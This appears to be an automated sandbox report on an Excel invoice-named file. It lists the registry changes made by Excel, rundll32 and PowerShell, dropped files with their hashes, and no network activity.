HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5172
Lithuanian Standard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5184
Sorbian Standard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5181
Georgian (Ergonomic)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5178
Bengali - INSCRIPT
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5142
Sami Extended Finland-Sweden
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5180
Bulgarian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5050
Greek (220) Latin
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5027
United States-Dvorak for left hand
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5082
Thai Pattachote (non-ShiftLock)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5195
Bulgarian (Phonetic Traditional)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5051
Greek (319) Latin
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5028
United States-Dvorak for right hand
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5047
Greek Latin
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5123
US English Table for IBM Arabic 238_L
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5122
Greek Polytonic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\system32\input.dll,-5183
Microsoft IME
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5149
Chinese (Traditional) - New Quick
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5067
Chinese (Traditional) - ChangJie
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5111
Chinese (Traditional) - Quick
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5066
Chinese (Traditional) - Phonetic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5090
Chinese (Traditional) - New Phonetic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5093
Chinese (Traditional) - New ChangJie
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5091
Chinese (Simplified) - Microsoft Pinyin New Experience Input Style
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5076
Chinese (Simplified) - Microsoft Pinyin ABC Input Style
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-90
Tablet PC Correction
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5183
Microsoft IME
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\IME\SpTip.DLL,-102
Speech Recognition
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-10
Chinese Traditional DaYi (version 6.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-11
Chinese Traditional Array (version 6.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-17
Amharic Input Method (version 1.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-16
Yi Input Method (version 1.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-12
Chinese Simplified QuanPin (version 6.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-14
Chinese Simplified ZhengMa (version 6.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-13
Chinese Simplified ShuangPin (version 6.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-91
Tablet PC Text Insertion
636
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000410
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
Enable
0
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
67699721
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
68158480
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000000
00000410
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
68158480
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Control Panel\Input Method\Hot Keys\00000104
1136
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
1136
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000410
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
Enable
0
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
68158480
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000000
00000410
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
68158480
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBar
ShowStatus
4
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBar
Transparency
255
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBar
Label
1
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBar
ExtraIconsOnMinimized
0
2076
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
2076
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
2076
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\FFDB1
2076
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{?8
7B3F38001C080000010000000000000000000000
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
1C08000068BDED2958F3D40100000000
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\FFDB1
FFDB1
(binary value omitted)
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\FFDB1
FFDB1
(binary value omitted: a UTF-16 blob holding the path C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls and its folder C:\Users\admin\Desktop\, followed by zero padding)
2076
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1317994523
2076
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1317994646
2076
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1317994502
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\FFDB1
FFDB1
(binary value omitted)
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\FFFD4
FFFD4
(binary value omitted)
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
[F00000000][T01D4F3582A9E0E20][O00000000]*C:\Users\admin\Desktop\
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Item 1
[F00000000][T01D4F3582AA07F20][O00000000]*C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
25921856
3368
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3640
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US

Files activity

Executable files
0
Suspicious files
6
Text files
10
Unknown types
6

Dropped files

PID
Process
Filename
Type
3640
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10085e.TMP
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
3564
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Documento_059025_FT_20190415_0005008_.xls.LNK
lnk
MD5: 4df007bfcad6ed429e64d4e9cc3665ae
SHA256: db7389025976db118e4ef6f8502721dfcbdbcf69e15a56fa99c380f795a61e92
3640
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WM900AV69H13QBRZ4C39.temp
––
MD5:  ––
SHA256:  ––
3368
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1004a5.TMP
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
3368
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
3368
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2BD6ZADV22E4EPU9K9MB.temp
––
MD5:  ––
SHA256:  ––
2076
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Documento_059025_FT_20190415_0005008_.xls.LNK
lnk
MD5: 6afda8f4e0eba8f5dc6821e2b0848318
SHA256: b24dae3ae9361f6f2242107133e1a81b012170729d7a9692e4798d94419fcfb9
2076
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 0b6bfe8bd6d7a7979a425b0d82d1e961
SHA256: 658f91442ff863b7483a2783780d50db6b9f7e4f808f1d68ac6f39bfb7c8f0ed
2076
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVRFBDB.tmp.cvr
––
MD5:  ––
SHA256:  ––
3564
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DF57ECACFF1CD0B401.TMP
––
MD5:  ––
SHA256:  ––
3640
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
3564
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 0b6bfe8bd6d7a7979a425b0d82d1e961
SHA256: 658f91442ff863b7483a2783780d50db6b9f7e4f808f1d68ac6f39bfb7c8f0ed
3564
EXCEL.EXE
C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls
document
MD5: 934fd27a4a167667838ed235821b836f
SHA256: ee57443623cfdc7a7941756d97e9f2a4c78cb3ad0c6b54a88869f4d1a10933cb
3564
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFD35FE8FEF69B95FD.TMP
––
MD5:  ––
SHA256:  ––
3564
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVRAB9D.tmp.cvr
––
MD5:  ––
SHA256:  ––
1160
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFF7E69A827E3A94F0.TMP
––
MD5:  ––
SHA256:  ––
1160
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Documento_059025_FT_20190415_0005008_.xls.LNK
lnk
MD5: 4df007bfcad6ed429e64d4e9cc3665ae
SHA256: db7389025976db118e4ef6f8502721dfcbdbcf69e15a56fa99c380f795a61e92
1160
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 0b6bfe8bd6d7a7979a425b0d82d1e961
SHA256: 658f91442ff863b7483a2783780d50db6b9f7e4f808f1d68ac6f39bfb7c8f0ed
1160
EXCEL.EXE
C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls
document
MD5: aab3f3faa98e4c8276038191aada4b77
SHA256: 5d1e9f1e8c37fe5cd5aca4f1d40c024af924bcbb429bb69a62f7dbb3b8921ee9
1160
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFB1A46F0D4242B6F7.TMP
––
MD5:  ––
SHA256:  ––
1160
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVR6BA6.tmp.cvr
––
MD5:  ––
SHA256:  ––

Find more information about the static content and download it in the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

No network activity.

Debug output strings

Process Message
powershell.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
powershell.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144